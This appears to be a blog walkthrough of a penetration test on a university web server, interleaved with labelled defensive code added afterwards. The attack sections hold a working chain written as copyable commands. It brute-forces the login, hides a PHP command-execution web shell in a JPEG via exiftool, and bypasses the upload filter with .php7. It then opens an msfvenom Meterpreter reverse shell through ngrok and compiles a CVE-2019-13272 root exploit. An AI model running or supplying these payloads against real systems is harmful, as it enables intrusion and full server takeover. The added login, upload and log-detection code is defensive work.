Hi all! How are you guys? I hope everything is fine. This time, I want to share my experience in getting root access on a Linux server.
It all started when I was asked by the head of the university to conduct a penetration test of the university's systems. I was given the task of identifying vulnerabilities on several major websites and other related sites. Over one year, I discovered various critical, high, and medium severity vulnerabilities. Until now, I had reported them without exploiting any of them.
However, on my last engagement this year, I decided to fully exploit the last site I managed to break into. The site is www.site.com.
This article is also similar to the article below.
Before starting, I did reconnaissance to gather information about the site. Since the site is protected by a WAF, I could not bruteforce directories. I did a manual search and found documentation on the site, which I then downloaded. I tested all the input forms and found that the login form has no rate limit. However, when I tried to bruteforce directories with ffuf, I was immediately blocked :(
Once I was no longer blocked, I decided to bruteforce the login page by combining information from the documentation with the rockyou wordlist. I noticed that if the username is valid but the password is incorrect, the site displays "incorrect password", but if the username is not valid, it displays "incorrect username or password". With this information, I focused on finding a valid username first and then bruteforced the password using Burp Suite. For further details, see the official PortSwigger article on username enumeration.
After waiting quite a long time, I finally got a valid password and immediately logged in.
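The two different error messages are what made the login attack work: they let an attacker confirm usernames before spending time on passwords. As an added example (not the site's code and not from the original post), here is a login check that returns one generic message for every failure, compares hashes in constant time, does the same hashing work for unknown users, and throttles failed attempts per account; the user store, iteration count and lockout thresholds are constructed for illustration.

```python
import hashlib
import hmac
import os
import time

GENERIC_ERROR = "incorrect username or password"  # identical text for every failure
MAX_FAILURES = 5          # constructed threshold for illustration
LOCKOUT_SECONDS = 900     # constructed lockout window
ITERATIONS = 200_000

def make_record(password: str) -> dict:
    # Salted PBKDF2 hash; a real deployment would use argon2/bcrypt via a library.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "hash": digest, "failures": 0, "locked_until": 0.0}

# Constructed user store: a single account exists.
USERS = {"admin": make_record("correct horse")}

# Dummy record so an unknown username costs the same hashing time as a real one
# (otherwise response timing would leak which usernames exist).
_DUMMY = make_record("dummy-value")

def login(username: str, password: str, now=None):
    """Return (success, message). The message never reveals whether the username exists."""
    now = time.time() if now is None else now
    record = USERS.get(username)
    target = record if record is not None else _DUMMY

    if record is not None and record["locked_until"] > now:
        return False, GENERIC_ERROR      # locked accounts get the same generic message

    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), target["salt"], ITERATIONS)
    ok = hmac.compare_digest(candidate, target["hash"]) and record is not None

    if ok:
        record["failures"] = 0
        return True, "ok"

    if record is not None:
        record["failures"] += 1
        if record["failures"] >= MAX_FAILURES:
            record["locked_until"] = now + LOCKOUT_SECONDS
    return False, GENERIC_ERROR
```

The per-account counter is what removes the "no rate limit" condition; it should be backed by shared storage in a real multi-process deployment.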
After successfully logging in, I looked for an upload form that could be used to upload the backdoor shell. However, it turned out to be very difficult. Here is a list of what I tried.
file.jpg >> 200 ok ( uploaded )
file.php >> 200 ok ( invalid extensions )
file.jpg.php >> 200 ok ( auto renamed to file.jpg )
file.phtml >> 200 ok ( invalid extensions )
file.shtml >> 200 ok ( invalid extensions )
file.php5 >> 200 ok ( invalid extensions )
file.php7 >> 200 ok (file downloaded)
When using .php7, the response was an automatic file download. After analyzing it, I found that large .php7 files are served as downloads, but if the file is under 1 MB and the extension is php7, the file is uploaded and saved. To get a small file, I used Exiftool to insert a backdoor shell into a photo. The backdoor shell was:
<?php system($_GET['cmd']); ?>
So the exiftool command becomes:
exiftool -Comment="<?php system($_GET['cmd']); ?>" file.jpg
[ file.jpg is the photo file you have ]
Before uploading it I made sure intercept was on in Burp Suite, and while uploading I changed the file extension from the original .jpg to .php7. After it was successfully uploaded, I immediately opened it and appended "?cmd" to the URL [ www.site.com/gallery/for-rce.php?cmd=whoami ]. The command ran as the apache user on the server.
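The upload filter above blocklists known PHP extensions but misses .php7, trusts a client-renamed file, and never looks inside the image, so the payload rides in a JPEG comment segment. As an added example (not the site's code and not part of the original post), here is an allowlist-based check that validates the last extension only, compares the content's magic bytes against the extension, scans for embedded PHP open tags, and has the server pick the stored name; the JPEG byte strings are constructed, and the tainted sample carries a harmless marker tag rather than a shell.

```python
import os
import re

# Allowlist: extension -> required leading bytes (magic)
ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
# "<?php" or "<?=" anywhere in the bytes, e.g. inside a COM/EXIF segment written by exiftool
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def check_upload(filename: str, data: bytes):
    """Allowlist-based upload check. Returns (accepted, reason)."""
    # Only the final extension counts: "file.jpg.php" normalises to ".php" and is rejected,
    # and "file.php7" is rejected simply because it is not on the allowlist.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"

def stored_name(filename: str) -> str:
    """The server chooses the on-disk name; the client-supplied name is never trusted."""
    ext = os.path.splitext(filename)[1].lower()
    return os.urandom(8).hex() + ext

# Constructed samples (not real photos)
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
# JPEG with a COM (0xFFFE) segment, the segment exiftool -Comment writes, holding a marker tag
_comment = b"<?php /* constructed marker, not a shell */ ?>"
TAINTED_JPEG = (b"\xff\xd8\xff\xfe" + (len(_comment) + 2).to_bytes(2, "big")
                + _comment + b"\xff\xd9")
```

Serving the upload directory with script execution disabled (no PHP handler for it) is the second half of the fix, so that even a file that slips through is never executed.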
Using wget, I immediately downloaded a larger backdoor shell and accessed it.
wget github.com/shell-backdoor [ backdoor web shell link tailored to what you have ]
However, the directory was shown in red in the shell, which means it was not writable by the apache user and I could not do much with those permissions.
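Every step so far (the ?cmd=whoami call, the wget of a second shell) leaves a line in the Apache access log. As an added example (not from the original post), here is a small detector that parses combined-format log lines and flags script files executed from an upload directory and command-style query parameters; the log lines and the list of upload directories are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format (constructed sample lines below)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
UPLOAD_DIRS = ("/gallery/", "/uploads/")   # assumed web-writable directories served by Apache
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|shtml|phar)$", re.IGNORECASE)
SHELL_PARAMS = {"cmd", "c", "exec", "command"}

def inspect(line: str):
    """Return the reasons a request is suspicious; an empty list means nothing was flagged."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable line"]
    parts = urlsplit(m["target"])
    reasons = []
    if parts.path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(parts.path):
        reasons.append("script executed from upload directory")
    params = parse_qs(parts.query)
    for key in sorted(params.keys() & SHELL_PARAMS):
        reasons.append(f"command parameter {key}={params[key][0]}")
    return reasons

def scan(log: str):
    """Return (client_ip, reasons) for every flagged line in the log text."""
    hits = []
    for line in log.splitlines():
        reasons = inspect(line)
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits

# Constructed sample log: one benign image fetch, two web-shell calls, one unrelated login
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0000] "GET /gallery/photo1.jpg HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:10:00:09 +0000] "GET /gallery/for-rce.php7?cmd=whoami HTTP/1.1" 200 7
203.0.113.7 - - [10/Oct/2023:10:01:30 +0000] "GET /gallery/for-rce.php7?cmd=ls%20-la HTTP/1.1" 200 840
198.51.100.4 - - [10/Oct/2023:10:02:00 +0000] "POST /login.php HTTP/1.1" 302 0
"""
```

A request for any script extension under an upload directory should never occur on a correctly configured server, so that rule alone is a high-confidence alert.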
Since I intended to go further, I ran Metasploit in my terminal and prepared a payload for the Linux server with msfvenom. Before that, I started ngrok.
ngrok tcp 1337
And created the payload.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=0.tcp.ap.ngrok.io LPORT=11589 -f elf -o backcon.elf
[ LHOST: the hostname ngrok gave you, without tcp://; LPORT: the port ngrok assigned ]
Payload generated successfully. Back to Metasploit.
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 1337 [ the port you passed to ngrok; in my case 1337 from "ngrok tcp 1337" ]
exploit
After that I uploaded the .elf file created earlier through the backdoor shell, and used the shell's command feature to make the file executable and run it.
chmod +x backcon.elf
./backcon.elf
And I got a session back.
Because my goal was to exploit the server and gain root access, I used the local exploit suggester. In Metasploit, type:
background
use post/multi/recon/local_exploit_suggester
set session 1
run
As you can see, the modules marked in green are the ones reported as vulnerable. To use one:
use [green module]
show options [ to see what needs to be set ]
Here I will use exploit/linux/local/su_login.
use exploit/linux/local/su_login
set LHOST [ adjust it to your server ]
set session 1
run
Unfortunately, the exploit failed :(
So I used another method: CVE-2019-13272. I downloaded the exploit source and uploaded it to the server, then back in Metasploit I typed:
shell
python -c 'import pty; pty.spawn("/bin/sh")'
gcc -s CVE-2019-13272.c -o gotroot
./gotroot
And after running it I got root access, as shown below.
[ screenshot: from apache user to root user ]
I immediately followed up on this by sending a detailed report to the developer. If there is something you don't understand because the explanation is not very detailed, don't hesitate to ask.
Maybe that's all from me; hopefully it can be a reference for you. I'm RyuuKhagetsu, see you in the next article.